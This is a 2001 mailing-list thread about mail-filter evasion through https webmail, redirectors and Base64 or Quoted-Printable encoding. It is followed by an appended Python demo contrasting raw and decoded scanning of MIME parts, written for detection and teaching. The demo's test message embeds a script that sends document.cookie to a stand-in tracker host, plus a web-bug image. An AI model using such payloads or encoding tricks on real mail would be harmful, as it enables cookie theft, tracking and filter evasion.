[Esa-l] Base64 encoded pages

Karl Dunn Karl.Dunn at vmic.com
Wed Feb 7 10:07:13 PST 2001


Encrypted mail via a browser and a http server that is a front end for
mail is *indeed* a security problem.  Encrypted http is a problem.  Maybe
Bjarni is right: encryption is the problem.

We use John's filter on gateways (sendmail relay hosts) for incoming and
outgoing mail.  Web access is through a packet-filtering firewall that
uses the TIS toolkit's proxies for telnet, ftp, and http.

If a luser on the inside uses a browser to look at a personal account
outside:

  1. None of the traffic is mail (it doesn't go through our filters or
relays); it's HTTP.

  2. The "webmail" sites I have noticed our lusers using use https.

These mean that not only are we not filtering anything, but we can't, even
if we somehow modify the TIS http proxy to filter traffic: it's strongly
encrypted from one end to the other.  The blasted luser can send or
receive any attachment at all.

I tried blocking the sites I knew about by telling the TIS http proxy not
to allow them.  That stopped it for all of a day or two, until several
lusers found a work-around and passed the word: they go to safeweb.com (a
free encrypting redirector like anonymizer.com), and get to the webmail
sites that way.  I tried blocking that, and one of the VPs complained, so
the IT director had me unblock safeweb.  He thinks the honor system will
work, but our logs still show a lot of traffic through safeweb, and a
really terrific volume of https (about a gigabyte each day to/from only
about 170 lusers).

I think we should block webmail sites as we find them, and block https
altogether, but I got outranked.  Purchasing and accounting have
legitimate uses for https, but for only a few sites, none of which provide
"mail service", so I could block everything but those.  Outvoted again.

The hole is getting wider every day.

At least John's filter is keeping the lusers from mailing the worms they
download out of here, so any legal liability we might incur is as
minimized as I can make it.  They can still "mail" bad stuff out through
the browsers, however.

This is a *serious* problem.  I don't see how to defend against it, except
by blocking https, and blocking "webmail" sites that use plain old http as
I find them.

I sure would like to hear some better ideas!

Karl Dunn     (KLD13)
VMIC
12090 South Memorial Parkway
Huntsville AL USA 35803
VOICE: (256) 382-8211 or (800) 322-3616
FAX:   (256) 650-5472 or (256) 882-0859

On Wed, 7 Feb 2001, Bjarni R. Einarsson wrote:

> On 2001-02-07, 08:57:01 (-0200), Andre Kajita - Administrador da Rede wrote:
> >
> > Then I nearly fell off my chair, the damn spammer encoded the page and
> > my Netscape Mailer (4.7 though I also use Mozilla) decoded and parsed
> > the HTML.
>
> As it should... :)
>
> This is only to be expected - as more and more people deploy
> simple filters which only scan the undecoded message body for
> crap, the spammers and virus writers will respond by encoding
> their messages as Base64 or Quoted-Printable since that will
> allow them to slip by the filters while remaining perfectly
> legible for the recipient.
>
> Just imagine how much fun we're going to have when crypto is the
> norm and not the exception for email...  I'm beginning to
> consider encryption of email as a security *risk*, since it
> implies that all security analysis of content will have to take
> place on the recipient's machine instead of at a central point as
> implemented by John's (and my) sanitizer.  Signed mail is fine,
> but encrypted mail is going to cause a whole slew of new
> problems.
>
> > I don't know if anyone else has had this problem - if it really is a
> > problem - but this is a first for me.  Is there any way to stop this
> > type of trash from coming in (and tracking with webbugs or Javascript
> > code)?
>
> If I recall correctly, this is on John's TODO list.  He
> explicitly mentioned it in his last release's changelog anyway
> (mentioned that it needed to be fixed, that is).
>
> My sanitizer (http://mailtools.anomy.net/) will sanitize the
> contents of base64-, uu- or quoted-printable-encoded attachments
> (remove javascript & other active HTML code), but it won't do the
> web-bug cleanup you're looking for.
>
> --
> Bjarni R. Einarsson                           PGP: 02764305, B7A3AB89
>  bre at klaki.net                -><-              http://bre.klaki.net/
>
> Check out my open-source email sanitizer: http://mailtools.anomy.net/
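The evasion Bjarni describes above (a filter that greps the undecoded message body is blind to the same HTML once it is Base64- or fully hex-escaped Quoted-Printable-encoded) is easy to reproduce. The following is an added example and is not code from the thread, from John's filter or from the Anomy sanitizer; the message, the tracking hostname tracker.example and the detection patterns are all constructed for the demonstration. It builds the same text/html part three ways, runs a raw-body regex scan (the "simple filter") and a scan that first decodes each MIME part's transfer encoding, and returns both verdicts so the difference is visible.

```python
"""
Added example, not from the original thread: a raw-body filter versus a
filter that decodes each MIME part before scanning.  All input is constructed.
"""
import base64
import re
from email import message_from_bytes

# Constructed detection patterns.  Base64 output never contains '<' or ':',
# so neither pattern can fire on an undecoded Base64 body.
ACTIVE_RE = re.compile(rb"<\s*script\b|javascript:", re.I)
# A remote 1x1 image: the classic tracking "web bug".
WEBBUG_RE = re.compile(
    rb"<img[^>]*\bsrc\s*=\s*[\"']?https?://[^>]*\b(width|height)\s*=\s*[\"']?1\b",
    re.I,
)

# Constructed spam body with inline script and a web bug (hostname is made up).
HTML_BODY = (
    b"<html><body><p>Special offer!</p>"
    b"<script>document.location='http://tracker.example/?c='+document.cookie</script>"
    b"<img src=\"http://tracker.example/bug.gif?id=42\" width=1 height=1>"
    b"</body></html>"
)


def qp_escape_all(data: bytes) -> bytes:
    """Quoted-Printable that hex-escapes every byte.  Still valid QP, so the
    mail reader decodes it, but nothing readable survives in the raw body."""
    hexed = b"".join(b"=%02X" % byte for byte in data)
    chunks = [hexed[i:i + 75] for i in range(0, len(hexed), 75)]  # 76-col limit
    return b"=\n".join(chunks) + b"\n"  # "=\n" is a QP soft line break


def build_message(cte: str) -> bytes:
    """Constructed single-part message with the given Content-Transfer-Encoding."""
    if cte == "base64":
        body = base64.encodebytes(HTML_BODY)
    elif cte == "quoted-printable":
        body = qp_escape_all(HTML_BODY)
    else:
        body = HTML_BODY + b"\n"
    headers = (
        b"From: spammer@example.invalid\n"
        b"To: victim@example.invalid\n"
        b"Subject: hello\n"
        b"MIME-Version: 1.0\n"
        b"Content-Type: text/html; charset=us-ascii\n"
        b"Content-Transfer-Encoding: " + cte.encode("ascii") + b"\n\n"
    )
    return headers + body


def scan_raw(raw: bytes) -> dict:
    """The 'simple filter': pattern-match the undecoded message as received."""
    return {
        "script": bool(ACTIVE_RE.search(raw)),
        "webbug": bool(WEBBUG_RE.search(raw)),
    }


def scan_decoded(raw: bytes) -> dict:
    """Walk the MIME tree and undo each leaf part's transfer encoding
    (Base64, QP, or none) before matching, which is what a sanitizer must do."""
    msg = message_from_bytes(raw)
    found = {"script": False, "webbug": False}
    for part in msg.walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True) or b""
        found["script"] |= bool(ACTIVE_RE.search(payload))
        found["webbug"] |= bool(WEBBUG_RE.search(payload))
    return found


def compare(cte: str) -> tuple:
    """Return (raw-scan verdict, decoded-scan verdict) for one encoding."""
    raw = build_message(cte)
    return scan_raw(raw), scan_decoded(raw)


if __name__ == "__main__":
    for cte in ("8bit", "base64", "quoted-printable"):
        raw_verdict, decoded_verdict = compare(cte)
        print(f"{cte:17s} raw={raw_verdict}  decoded={decoded_verdict}")
```

Only the 8bit message is caught by the raw scan; for the Base64 and hex-escaped QP variants the raw scan reports nothing while the decoding scan finds both the script and the web bug. The same decode-then-inspect step is what a gateway filter needs for attachments as well, since an attachment is just another encoded part in the walk.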